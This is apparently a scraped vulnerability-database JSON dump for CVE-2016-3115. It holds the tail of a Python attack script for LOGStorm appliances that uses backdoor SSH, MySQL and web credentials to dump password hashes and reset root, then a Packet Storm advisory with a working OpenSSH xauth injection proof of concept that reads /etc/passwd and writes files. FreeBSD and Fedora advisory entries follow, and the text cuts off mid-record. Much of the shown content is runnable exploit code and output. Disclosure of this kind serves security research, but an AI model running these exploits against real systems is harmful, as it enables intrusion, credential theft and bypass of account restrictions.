ssh_exception.AuthenticationException: \nprint(\"\\n[-] Action failed, could not login with root credentials\\n\") \nreturn \n \nprint(\"[+] Success!\") \nssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(\"id\") \nprint(ssh_stdout.readline()) \n \nreturn \n \n# \n# ssh login as htinit and reset root password to the default \n# \nelif(action == \"reset\"): \nprint(\"[~] Resetting password on %s...\" % host) \n \ntry: \nssh.connect(host, SSH_PORT, HTINIT_CREDS[0], HTINIT_CREDS[1], timeout=SSH_TIMEOUT) \nexcept ssh_exception.AuthenticationException: \nprint(\"\\n[-] Reset failed, could not login with htinit credentials\\n\") \nreturn \n \nssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(\"\") \n \nssh_stdin.write(\"4\" + \"\\n\") \ntime.sleep(2) \nssh_stdin.write(ROOT_CREDS[1] + \"\\n\") \ntime.sleep(2) \nssh_stdin.write(\"^C\" + \"\\n\") \ntime.sleep(1) \n \nprint(\"[+] Appliance root password should now be reset\") \n \nreturn \n \n# \n# sql login as htr and select user/hash columns from the web users table \n# \nelif(action == \"sql\"): \nprint(\"[~] Asking %s for it's web users and their password hashes...\" % host) \n \ntry: \ndb = MySQLdb.connect(host=host, port=MYSQL_PORT, user=MYSQL_CREDS[0], passwd=MYSQL_CREDS[1], db=MYSQL_DB, connect_timeout=3) \nexcept MySQLdb.Error as error: \nprint(\"\\n[-] Failed to connect to %s:\\n%s\\n\" % (host, error)) \nreturn \n \ncursor = db.cursor() \ncursor.execute(MYSQL_CMD) \n \ndata = cursor.fetchall() \n \nprint(\"[+] Got creds!\\n\") \n \nfor row in data: \nprint(\"USER_ID: %s\\nMD5_PASSWORD: %s\\n\" % (row[0], row[1])) \n \ndb.close() \n \nreturn \n \n# \n# http login as webserviceuser and gain presumably admin privileges \n# \nelif(action == \"web\"): \nprint(\"[~] Attempting to login as backdoor web user at %s...\" % host) \n \ntry: \nclient = httplib.HTTPSConnection(host) \nexcept: \nprint(\"[-] Couldn't establish SSL connection to %s\" % host) \nreturn \n \nparams = urllib.urlencode({\"j_username\" : WEB_CREDS[0], \"j_password\" : WEB_CREDS[1]}) \nheaders = {\"Host\" : host, \"Content-Type\" : \"application/x-www-form-urlencoded\", \"Content-Length\" : \"57\"} \n \nclient.request(\"POST\", WEB_URL, params, headers) \n \nresponse = client.getresponse() \n \nif(response.status == 408): \nprint(\"[+] Success!\") \nelse: \nprint(\"[-] Service returned %d %s, which is actually not our criteria for success\" % (response.status, response.reason)) \n \nreturn \n \n# \n# check the ssh network banner to identify appliances within range of <host>/24 \n# \nelif(action == \"scan\"): \ncount = 0 \nprint(\"[~] Scanning %s for LOGStorm appliances...\" % sys.argv[2]) \n \nfor x in range(1,255): \nbanner = None \n \n# \n# 10.1.1.1/24 -> 10.1.1.[x] \n# \nhost = str(sys.argv[2]).split('/')[0][:-1] + str(x) \n \ntry: \nssh.connect(host, SSH_PORT, \"user-that-doesnt-exist\", \"pass-that-doesnt-work\", timeout=2) \nexcept ssh_exception.NoValidConnectionsError: \npass \nexcept socket.timeout: \npass \nexcept ssh_exception.AuthenticationException as error: \nbanner = ssh._transport.get_banner() \nif banner and SSH_BANNER in banner: \nprint(\"[!] %s\\n\" % host) \ncount+=1 \n \nprint(\"[+] Found %d appliance(s)\"% count) \n \nreturn \n \n \nif __name__ == \"__main__\": \nmain() \n`\n", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/140019/logstorm.py.txt"}, {"lastseen": "2016-12-05T22:19:30", "description": "", "published": "2016-03-15T00:00:00", "type": "packetstorm", "title": "OpenSSH 7.2p1 xauth Command Injection / Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3115"], "modified": "2016-03-15T00:00:00", "id": "PACKETSTORM:136234", "href": "https://packetstormsecurity.com/files/136234/OpenSSH-7.2p1-xauth-Command-Injection-Bypass.html", "sourceData": "`Author: <github.com/tintinweb> \nRef: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115 \nVersion: 0.2 \nDate: Mar 3rd, 2016 \n \nTag: openssh xauth command injection may lead to forced-command and /bin/false bypass \n \nOverview \n-------- \n \nName: openssh \nVendor: OpenBSD \nReferences: * http://www.openssh.com/[1] \n \nVersion: 7.2p1 [2] \nLatest Version: 7.2p1 \nOther Versions: <= 7.2p1 (all versions; dating back ~20 years) \nPlatform(s): linux \nTechnology: c \n \nVuln Classes: CWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection') \nOrigin: remote \nMin. Privs.: post auth \n \nCVE: CVE-2016-3115 \n \n \n \nDescription \n--------- \n \nquote website [1] \n \n>OpenSSH is the premier connectivity tool for remote login with the SSH protocol. It encrypts all traffic to eliminate eavesdropping, connection hijacking, and other attacks. In addition, OpenSSH provides a large suite of secure tunneling capabilities, several authentication methods, and sophisticated configuration options. \n \nSummary \n------- \n \nAn authenticated user may inject arbitrary xauth commands by sending an \nx11 channel request that includes a newline character in the x11 cookie. \nThe newline acts as a command separator to the xauth binary. This attack requires \nthe server to have 'X11Forwarding yes' enabled. Disabling it, mitigates this vector. \n \nBy injecting xauth commands one gains limited* read/write arbitrary files, \ninformation leakage or xauth-connect capabilities. These capabilities can be \nleveraged by an authenticated restricted user - e.g. one with the login shell \nconfigured as /bin/false or one with configured forced-commands - to bypass \naccount restriction. This is generally not expected. \n \nThe injected xauth commands are performed with the effective permissions of the \nlogged in user as the sshd already dropped its privileges. \n \nQuick-Info: \n \n* requires: X11Forwarding yes \n* bypasses /bin/false and forced-commands \n** OpenSSH does not treat /bin/false like /bin/nologin (in contrast to Dropbear) \n* does not bypass /bin/nologin (as there is special treatment for this) \n \nCapabilities (xauth): \n \n* Xauth \n* write file: limited chars, xauthdb format \n* read file: limit lines cut at first \\s \n* infoleak: environment \n* connect to other devices (may allow port probing) \n \n \nPoC see ref github. \nPatch see ref github. \n \n \nDetails \n------- \n \n// see annotated code below \n \n* server_input_channel_req (serverloop.c) \n*- session_input_channel_req:2299 (session.c [2]) \n*- session_x11_req:2181 \n \n* do_exec_pty or do_exec_no_pty \n*- do_child \n*- do_rc_files (session.c:1335 [2]) \n \nUpon receiving an `x11-req` type channel request sshd parses the channel request \nparameters `auth_proto` and `auth_data` from the client ssh packet where \n`auth_proto` contains the x11 authentication method used (e.g. `MIT-MAGIC-COOKIE-1`) \nand `auth_data` contains the actual x11 auth cookie. This information is stored \nin a session specific datastore. When calling `execute` on that session, sshd will \ncall `do_rc_files` which tries to figure out if this is an x11 call by evaluating \nif `auth_proto` and `auth_data` (and `display`) are set. If that is the case AND \nthere is no system `/sshrc` existent on the server AND it no user-specific `$HOME/.ssh/rc` \nis set, then `do_rc_files` will run `xauth -q -` and pass commands via `stdin`. \nNote that `auth_data` nor `auth_proto` was sanitized or validated, it just contains \nuser-tainted data. Since `xauth` commands are passed via `stdin` and `\\n` is a \ncommand-separator to the `xauth` binary, this allows a client to inject arbitrary \n`xauth` commands. \n \nSidenote #1: in case sshd takes the `$HOME/.ssh/rc` branch, it will pass the tainted \ninput as arguments to that script. \nSidenote #2: client code also seems to not sanitize `auth_data`, `auth_proto`. [3] \n \nThis is an excerpt of the `man xauth` [4] to outline the capabilities of this xauth \ncommand injection: \n \nSYNOPSIS \nxauth [ -f authfile ] [ -vqibn ] [ command arg ... ] \n \nadd displayname protocolname hexkey \ngenerate displayname protocolname [trusted|untrusted] [timeout seconds] [group group-id] [data hexdata] \n[n]extract filename displayname... \n[n]list [displayname...] \n[n]merge [filename...] \nremove displayname... \nsource filename \ninfo \nexit \nquit \nversion \nhelp \n? \n \nInteresting commands are: \n \ninfo - leaks environment information / path \n~# xauth info \nxauth: file /root/.Xauthority does not exist \nAuthority file: /root/.Xauthority \nFile new: yes \nFile locked: no \nNumber of entries: 0 \nChanges honored: yes \nChanges made: no \nCurrent input: (argv):1 \n \nsource - arbitrary file read (cut on first `\\s`) \n# xauth source /etc/shadow \nxauth: file /root/.Xauthority does not exist \nxauth: /etc/shadow:1: unknown command \"smithj:Ep6mckrOLChF.:10063:0:99999:7:::\" \n \nextract - arbitrary file write \n* limited characters \n* in xauth.db format \n* since it is not compressed it can be combined with `xauth add` to \nfirst store data in the database and then export it to an arbitrary \nlocation e.g. to plant a shell or do other things. \n \ngenerate - connect to <ip>:<port> (port probing, connect back and pot. exploit \nvulnerabilities in X.org \n \n \nSource \n------ \n \nInline annotations are prefixed with `//#!` \n \n \n/* \n* Run $HOME/.ssh/rc, /etc/ssh/sshrc, or xauth (whichever is found \n* first in this order). \n*/ \nstatic void \ndo_rc_files(Session *s, const char *shell) \n{ \n... \nsnprintf(cmd, sizeof cmd, \"%s -q -\", \noptions.xauth_location); \nf = popen(cmd, \"w\"); //#! run xauth -q - \nif (f) { \nfprintf(f, \"remove %s\\n\", //#! remove <user_tainted_data> - injecting \\n auth_display injects xauth command \ns->auth_display); \nfprintf(f, \"add %s %s %s\\n\", //#! \\n injection \ns->auth_display, s->auth_proto, \ns->auth_data); \npclose(f); \n} else { \nfprintf(stderr, \"Could not run %s\\n\", \ncmd); \n} \n} \n} \n \nProof of Concept \n---------------- \n \nPrerequisites: \n \n* install python 2.7.x \n* issue `#> pip install paramiko` to install `paramiko` ssh library for python 2.x \n* make sure `poc.py` \n \n \nUsage: <host> <port> <username> <password or path_to_privkey> \n \npath_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key \n \n \npoc: \n \n1. configure one user (user1) for `force-commands` and another one with `/bin/false` in `/etc/passwd`: \n \n#PUBKEY line - force commands: only allow \"whoami\" \n#cat /home/user1/.ssh/authorized_keys \ncommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user1@box \n \n#cat /etc/passwd \nuser2:x:1001:1002:,,,:/home/user2:/bin/false \n \n2. run sshd with `X11Forwarding yes` (kali default config) \n \n#> /root/openssh-7.2p1/sshd -p 22 -f sshd_config -D -d \n \n3. `forced-commands` - connect with user1 and display env information \n \n#> python <host> 22 user1 .demoprivkey \n \nINFO:__main__:add this line to your authorized_keys file: \n#PUBKEY line - force commands: only allow \"whoami\" \n#cat /home/user/.ssh/authorized_keys \ncommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box \n \nINFO:__main__:connecting to: user1:<PKEY>@host:22 \nINFO:__main__:connected! \nINFO:__main__: \nAvailable commands: \n.info \n.readfile <path> \n.writefile <path> <data> \n.exit .quit \n<any xauth command or type help> \n \n#> .info \nDEBUG:__main__:auth_cookie: '\\ninfo' \nDEBUG:__main__:dummy exec returned: None \nINFO:__main__:Authority file: /home/user1/.Xauthority \nFile new: no \nFile locked: no \nNumber of entries: 1 \nChanges honored: yes \nChanges made: no \nCurrent input: (stdin):3 \n/usr/bin/xauth: (stdin):2: bad \"add\" command line \n... \n \n4. `forced-commands` - read `/etc/passwd` \n \n... \n#> .readfile /etc/passwd \nDEBUG:__main__:auth_cookie: 'xxxx\\nsource /etc/passwd\\n' \nDEBUG:__main__:dummy exec returned: None \nINFO:__main__:root:x:0:0:root:/root:/bin/bash \ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin \nbin:x:2:2:bin:/bin:/usr/sbin/nologin \nsys:x:3:3:sys:/dev:/usr/sbin/nologin \nsync:x:4:65534:sync:/bin:/bin/sync \n... \n \n5. `forced-commands` - write `/tmp/testfile` \n \n#> .writefile /tmp/testfile `thisisatestfile` \nDEBUG:__main__:auth_cookie: '\\nadd 127.0.0.250:65500 `thisisatestfile` aa' \nDEBUG:__main__:dummy exec returned: None \nDEBUG:__main__:auth_cookie: '\\nextract /tmp/testfile 127.0.0.250:65500' \nDEBUG:__main__:dummy exec returned: None \nDEBUG:__main__:/usr/bin/xauth: (stdin):2: bad \"add\" command line \n \n#> ls -lsat /tmp/testfile \n4 -rw------- 1 user1 user1 59 xx xx 13:49 /tmp/testfile \n \n#> cat /tmp/testfile \n\\FA65500hi\\FA65500`thisisatestfile`\\AA \n \n6. `/bin/false` - connect and read `/etc/passwd` \n \n#> python <host> 22 user2 user2password \nINFO:__main__:connecting to: user2:user2password@host:22 \nINFO:__main__:connected! \nINFO:__main__: \nAvailable commands: \n.info \n.readfile <path> \n.writefile <path> <data> \n.exit .quit \n<any xauth command or type help> \n \n#> .readfile /etc/passwd \nDEBUG:__main__:auth_cookie: 'xxxx\\nsource /etc/passwd\\n' \nDEBUG:__main__:dummy exec returned: None \nINFO:__main__:root:x:0:0:root:/root:/bin/bash \ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin \nbin:x:2:2:bin:/bin:/usr/sbin/nologin \nsys:x:3:3:sys:/dev:/usr/sbin/nologin \n... \nuser2:x:1001:1002:,,,:/home/user2:/bin/false \n... \n \n7. `/bin/false` - initiate outbound X connection to 8.8.8.8:6100 \n \n#> generate 8.8.8.8:100 . \n \n#> tcpdump \nIP <host>.42033 > 8.8.8.8.6100: Flags [S], seq 1026029124, win 29200, options [mss 1460,sackOK,TS val 431416709 ecr 0,nop,wscale 10], length 0 \n \n \nMitigation / Workaround \n------------------------ \n \n* disable x11-forwarding: `sshd_config` set `X11Forwarding no` \n* disable x11-forwarding for specific user with forced-commands: `no-x11-forwarding` in `authorized_keys` \n \nNotes \n----- \n \nVerified, resolved and released within a few days. very impressive. \n \nVendor response: see advisory [5] \n \nReferences \n---------- \n \n[1] http://www.openssh.com/ \n[2] https://github.com/openssh/openssh-portable/blob/5a0fcb77287342e2fc2ba1cee79b6af108973dc2/session.c#L1388 \n[3] https://github.com/openssh/openssh-portable/blob/19bcf2ea2d17413f2d9730dd2a19575ff86b9b6a/clientloop.c#L376 \n[4] http://linux.die.net/man/1/xauth \n[5] http://www.openssh.com/txt/x11fwd.adv \n \n======== poc.py ======== \n \n#!/usr/bin/env python \n# -*- coding: UTF-8 -*- \n# Author : <github.com/tintinweb> \n############################################################################### \n# \n# FOR DEMONSTRATION PURPOSES ONLY! \n# \n############################################################################### \nimport logging \nimport StringIO \nimport sys \nimport os \n \nLOGGER = logging.getLogger(__name__) \ntry: \nimport paramiko \nexcept ImportError, ie: \nlogging.exception(ie) \nlogging.warning(\"Please install python-paramiko: pip install paramiko / easy_install paramiko / <distro_pkgmgr> install python-paramiko\") \nsys.exit(1) \n \nclass SSHX11fwdExploit(object): \ndef __init__(self, hostname, username, password, port=22, timeout=0.5, \npkey=None, pkey_pass=None): \nself.ssh = paramiko.SSHClient() \nself.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) \nif pkey: \npkey = paramiko.RSAKey.from_private_key(StringIO.StringIO(pkey),pkey_pass) \nself.ssh.connect(hostname=hostname, port=port, \nusername=username, password=password, \ntimeout=timeout, banner_timeout=timeout, \nlook_for_keys=False, pkey=pkey) \n \ndef exploit(self, cmd=\"xxxx\\n?\\nsource /etc/passwd\\n\"): \ntransport = self.ssh.get_transport() \nsession = transport.open_session() \nLOGGER.debug(\"auth_cookie: %s\"%repr(cmd)) \nsession.request_x11(auth_cookie=cmd) \nLOGGER.debug(\"dummy exec returned: %s\"%session.exec_command(\"\")) \n \ntransport.accept(0.5) \nsession.recv_exit_status() # block until exit code is ready \nstdout, stderr = [],[] \nwhile session.recv_ready(): \nstdout.append(session.recv(4096)) \nwhile session.recv_stderr_ready(): \nstderr.append(session.recv_stderr(4096)) \nsession.close() \nreturn ''.join(stdout)+''.join(stderr) # catch stdout, stderr \n \ndef exploit_fwd_readfile(self, path): \ndata = self.exploit(\"xxxx\\nsource %s\\n\"%path) \nif \"unable to open file\" in data: \nraise IOError(data) \nret = [] \nfor line in data.split('\\n'): \nst = line.split('unknown command \"',1) \nif len(st)==2: \nret.append(st[1].strip(' \"')) \nreturn '\\n'.join(ret) \n \ndef exploit_fwd_write_(self, path, data): \n''' \nadds display with protocolname containing userdata. badchars=<space> \n \n''' \ndummy_dispname = \"127.0.0.250:65500\" \nret = self.exploit('\\nadd %s %s aa'%(dummy_dispname, data)) \nif ret.count('bad \"add\" command line')>1: \nraise Exception(\"could not store data most likely due to bad chars (no spaces, quotes): %s\"%repr(data)) \nLOGGER.debug(self.exploit('\\nextract %s %s'%(path,dummy_dispname))) \nreturn path \n \ndemo_authorized_keys = '''#PUBKEY line - force commands: only allow \"whoami\" \n#cat /home/user/.ssh/authorized_keys \ncommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box \n''' \nPRIVKEY = \"\"\"-----BEGIN RSA PRIVATE KEY----- \nMIIEowIBAAKCAQEAtUaWCq7z5CM7wGH1/2XlNVMy7glVgYCVHjf8BUZo+FypdD69 \n9SPu06CZ3e0vSUx5KxlQ7vgU6CtH9nQli53oMy225a/RUGEon/axzVtwTpMnVLqn \nPLEUn9zPaCjwwpg/Brhr5+NHc3bm/u/LHmKrEg6IjyWssE16exuhA3G/Teed+NaN \nzKR3jVLrmXohc9dp57jYBPLZJ5NSojsd27LjdWnq/PokxwvkQOrOPkhTne+7GRts \nU68nW5a99jMSb4bpgqsUsIY0IIsKc1nfzUxonvcXmh+RASIffLCzA0OdQyJ7UrPh \nTLw8dVOK2e9zsJYlOYUA6G3rnzq9sNmqe7XdeQIDAQABAoIBAHu5M4sTIc8h5RRH \nSBkKuMgOgwJISJ3c3uoDF/WZuudYhyeZ8xivb7/tK1d3HQEQOtsZqk2P8OUNNU6W \ns1F5cxQLLXvS5i/QQGP9ghlBQYO/l+aShrY7vnHlyYGz/68xLkMt+CgKzaeXDc4O \naDnS6iOm27mn4xdpqiEAGIM7TXCjcPSQ4l8YPxaj84rHBcD4w033Sdzc7i73UUne \neuQL7bBz5xNibOIFPY3h4q6fbw4bJtPBzAB8c7/qYhJ5P3czGxtqhSqQRogK8T6T \nA7fGezF90krTGOAz5zJGV+F7+q0L9pIR+uOg+OBFBBmgM5sKRNl8pyrBq/957JaA \nrhSB0QECgYEA1604IXr4CzAa7tKj+FqNdNJI6jEfp99EE8OIHUExTs57SaouSjhe \nDDpBRSTX96+EpRnUSbJFnXZn1S9cZfT8i80kSoM1xvHgjwMNqhBTo+sYWVQrfBmj \nbDVVbTozREaMQezgHl+Tn6G1OuDz5nEnu+7gm1Ud07BFLqi8Ssbhu2kCgYEA1yrc \nKPIAIVPZfALngqT6fpX6P7zHWdOO/Uw+PoDCJtI2qljpXHXrcI4ZlOjBp1fcpBC9 \n2Q0TNUfra8m3LGbWfqM23gTaqLmVSZSmcM8OVuKuJ38wcMcNG+7DevGYuELXbOgY \nnimhjY+3+SXFWIHAtkJKAwZbPO7p857nMcbBH5ECgYBnCdx9MlB6l9rmKkAoEKrw \nGt629A0ZmHLftlS7FUBHVCJWiTVgRBm6YcJ5FCcRsAsBDZv8MW1M0xq8IMpV83sM \nF0+1QYZZq4kLCfxnOTGcaF7TnoC/40fOFJThgCKqBcJQZKiWGjde1lTM8lfTyk+f \nW3p2+20qi1Yh+n8qgmWpsQKBgQCESNF6Su5Rjx+S4qY65/spgEOOlB1r2Gl8yTcr \nbjXvcCYzrN4r/kN1u6d2qXMF0zrPk4tkumkoxMK0ThvTrJYK3YWKEinsucxSpJV/ \nnY0PVeYEWmoJrBcfKTf9ijN+dXnEdx1LgATW55kQEGy38W3tn+uo2GuXlrs3EGbL \nb4qkQQKBgF2XUv9umKYiwwhBPneEhTplQgDcVpWdxkO4sZdzww+y4SHifxVRzNmX \nAo8bTPte9nDf+PhgPiWIktaBARZVM2C2yrKHETDqCfme5WQKzC8c9vSf91DSJ4aV \npryt5Ae9gUOCx+d7W2EU7RIn9p6YDopZSeDuU395nxisfyR1bjlv \n-----END RSA PRIVATE KEY-----\"\"\" \n \n \nif __name__==\"__main__\": \nlogging.basicConfig(loglevel=logging.DEBUG) \nLOGGER.setLevel(logging.DEBUG) \n \nif not len(sys.argv)>4: \nprint \"\"\" Usage: <host> <port> <username> <password or path_to_privkey> \n \npath_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key \n \n\"\"\" \nsys.exit(1) \nhostname, port, username, password = sys.argv[1:] \nport = int(port) \npkey = None \nif os.path.isfile(password): \npassword = None \nwith open(password,'r') as f: \npkey = f.read() \nelif password==\".demoprivkey\": \npkey = PRIVKEY \npassword = None \nLOGGER.info(\"add this line to your authorized_keys file: \\n%s\"%demo_authorized_keys) \n \nLOGGER.info(\"connecting to: %s:%s@%s:%s\"%(username,password if not pkey else \"<PKEY>\", hostname, port)) \nex = SSHX11fwdExploit(hostname, port=port, \nusername=username, password=password, \npkey=pkey, \ntimeout=10 \n) \nLOGGER.info(\"connected!\") \nLOGGER.info (\"\"\" \nAvailable commands: \n.info \n.readfile <path> \n.writefile <path> <data> \n.exit .quit \n<any xauth command or type help> \n\"\"\") \nwhile True: \ncmd = raw_input(\"#> \").strip() \nif cmd.lower().startswith(\".exit\") or cmd.lower().startswith(\".quit\"): \nbreak \nelif cmd.lower().startswith(\".info\"): \nLOGGER.info(ex.exploit(\"\\ninfo\")) \nelif cmd.lower().startswith(\".readfile\"): \nLOGGER.info(ex.exploit_fwd_readfile(cmd.split(\" \",1)[1])) \nelif cmd.lower().startswith(\".writefile\"): \nparts = cmd.split(\" \") \nLOGGER.info(ex.exploit_fwd_write_(parts[1],' '.join(parts[2:]))) \nelse: \nLOGGER.info(ex.exploit('\\n%s'%cmd)) \n \n# just playing around \n#print ex.exploit_fwd_readfile(\"/etc/passwd\") \n#print ex.exploit(\"\\ninfo\") \n#print ex.exploit(\"\\ngenerate <ip>:600<port> .\") # generate <ip>:port port=port+6000 \n#print ex.exploit(\"\\nlist\") \n#print ex.exploit(\"\\nnlist\") \n#print ex.exploit('\\nadd xx xx \"\\n') \n#print ex.exploit('\\ngenerate :0 . data \"') \n#print ex.exploit('\\n?\\n') \n#print ex.exploit_fwd_readfile(\"/etc/passwd\") \n#print ex.exploit_fwd_write_(\"/tmp/somefile\", data=\"`whoami`\") \nLOGGER.info(\"--quit--\") \n`\n", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/136234/opensshfalse-bypass.txt"}], "freebsd": [{"lastseen": "2019-05-29T18:32:46", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3115"], "description": "\nThe OpenSSH project reports:\n\nMissing sanitisation of untrusted input allows an\n\t authenticated user who is able to request X11 forwarding\n\t to inject commands to xauth(1).\n\t \nInjection of xauth commands grants the ability to read\n\t arbitrary files under the authenticated user's privilege,\n\t Other xauth commands allow limited information leakage,\n\t file overwrite, port probing and generally expose xauth(1),\n\t which was not written with a hostile user in mind, as an\n\t attack surface.\n\t \nMitigation:\nSet X11Forwarding=no in sshd_config. This is the default.\nFor authorized_keys that specify a \"command\" restriction,\n\t also set the \"restrict\" (available in OpenSSH >=7.2) or\n\t \"no-x11-forwarding\" restrictions.\n\t \n\n", "edition": 4, "modified": "2016-08-09T00:00:00", "published": "2016-03-11T00:00:00", "id": "E4644DF8-E7DA-11E5-829D-C80AA9043978", "href": "https://vuxml.freebsd.org/freebsd/e4644df8-e7da-11e5-829d-c80aa9043978.html", "title": "openssh -- command injection when X11Forwarding is enabled", "type": "freebsd", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3115"], "description": "SSH (Secure SHell) is a program for logging into and executing commands on a remote machine. SSH is intended to replace rlogin and rsh, and to provide secure encrypted communications between two untrusted hosts over an insecure network. X11 connections and arbitrary TCP/IP ports can also be forwarded over the secure channel. OpenSSH is OpenBSD's version of the last free version of SSH, bringing it up to date in terms of security and features. This package includes the core files necessary for both the OpenSSH client and server. To make this package useful, you should also install openssh-clients, openssh-server, or both. ", "modified": "2016-03-29T19:23:45", "published": "2016-03-29T19:23:45", "id": "FEDORA:ECCBA601614F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: openssh-6.9p1-11.fc22", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3115"], "description": "SSH (Secure SHell) is a program for logging into and executing commands on a remote machine. SSH is intended to replace rlogin and rsh, and to provide secure encrypted communications between two untrusted hosts over an insecure network. X11 connections and arbitrary TCP/IP ports can also be forwarded over the secure channel. OpenSSH is OpenBSD's version of the last free version of SSH, bringing it up to date in terms of security and features. This version of OpenSSH has been modified to support GSI authentication. This package includes the core files necessary for both the gsissh client and server. To make this package useful, you should also install gsi-openssh-clients, gsi-openssh-server, or both. ", "modified": "2016-05-07T13:36:50", "published": "2016-05-07T13:36:50", "id": "FEDORA:34AAC6006272", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: gsi-openssh-7.2p2-2.fc24", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3115"], "description": "SSH (Secure SHell) is a program for logging into and executing commands on a remote machine. SSH is intended to replace rlogin and rsh, and to provide secure encrypted communications between two untrusted hosts over an insecure network. X11 connections and arbitrary TCP/IP ports can also be forwarded over the secure channel. OpenSSH is OpenBSD's version of the last free version of SSH, bringing it up to date in terms of security and features. This package includes the core files necessary for both the OpenSSH client and server. To make this package useful, you should also install openssh-clients, openssh-server, or both. ", "modified": "2016-03-27T00:54:18", "published": "2016-03-27T00:54:18", "id": "FEDORA:6D06760BBCF5", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: openssh-7.2p2-1.fc24", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3115"], "description": "SSH (Secure SHell) is a program for logging into and executing commands on a remote machine. SSH is intended to replace rlogin and rsh, and to provide secure encrypted communications between two untrusted hosts over an insecure network. X11 connections and arbitrary TCP/IP ports can also be forwarded over the secure channel. OpenSSH is OpenBSD's version of the last free version of SSH, bringing it up to date in terms of security and features. This package includes the core files necessary for both the OpenSSH client and server. To make this package useful, you should also install openssh-clients, openssh-server, or both. ", "modified": "2016-03-13T23:57:13", "published": "2016-03-13T23:57:13", "id": "FEDORA:407BB60A2C79", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: openssh-7.2p2-1.fc23", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3115"], "description": "SSH (Secure SHell) is a program for logging into and executing commands on a remote machine. SSH is intended to replace rlogin and rsh, and to provide secure encrypted communications between two untrusted hosts over an insecure network. X11 connections and arbitrary TCP/IP ports can also be forwarded over the secure channel. OpenSSH is OpenBSD's version of the last free version of SSH, bringing it up to date in terms of security and features. This version of OpenSSH has been modified to support GSI authentication. This package includes the core files necessary for both the gsissh client and server. To make this package useful, you should also install gsi-openssh-clients, gsi-openssh-server, or both. ", "modified": "2016-04-25T23:56:33", "published": "2016-04-25T23:56:33", "id": "FEDORA:8B394604A712", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: gsi-openssh-7.2p2-1.fc23", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3115"], "description": "SSH (Secure SHell) is a program for logging into and executing commands on a remote machine. SSH is intended to replace rlogin and rsh, and to provide secure encrypted communications between two untrusted hosts over an insecure network. X11 connections and 